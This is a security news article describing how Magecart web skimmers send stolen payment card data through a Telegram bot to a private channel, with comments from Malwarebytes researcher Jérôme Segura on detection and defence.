The cybercriminals attacking online stores have adopted a new tactic of using the Telegram messaging app to send stolen payment details from compromised websites back to the attackers.
Kraut explained in a Twitter thread about the working of the script, noting that it collects data from any type of input field and sends it to a Telegram channel.
Magecart hackers who target online shopping cart systems usually inject e-skimmers on shopping websites by exploiting a known vulnerability or stolen credentials to steal credit card details.
Recently they have stepped up in their efforts to hide card stealer code inside image metadata and even carry out IDN homograph attacks to plant web skimmers concealed within a website’s favicon file.
However, the method of exfiltrating the data such as name, address, credit card number, expiry, and CVV this time, is interestingly new as it is done via an instant message sent to a private Telegram channel using an encoded bot ID in the skimmer code.
The information is encrypted using a public key and a Telegram bot posts the stolen data in a chat as a message.
The advantage of using Telegram is that threat actors do not have to set up a separate command-and-control infrastructure to transmit the collected information or risk facing the possibility of those domains being taken down or blocked by anti-malware services.
Jérôme Segura, Director of Threat Intelligence at Malwarebytes who also analyzed this script stated that defending against this type of skimming attack is a little trickier since it depends on a legitimate communication service. One could block all connections to Telegram at the network level, but it is easy for the attackers to switch to another provider or platform and still get away with it.
Segura says that Malwarebytes has identified few online stores infected with this variant of payment card skimmer. However, the researcher states that there might be even more that have been infected.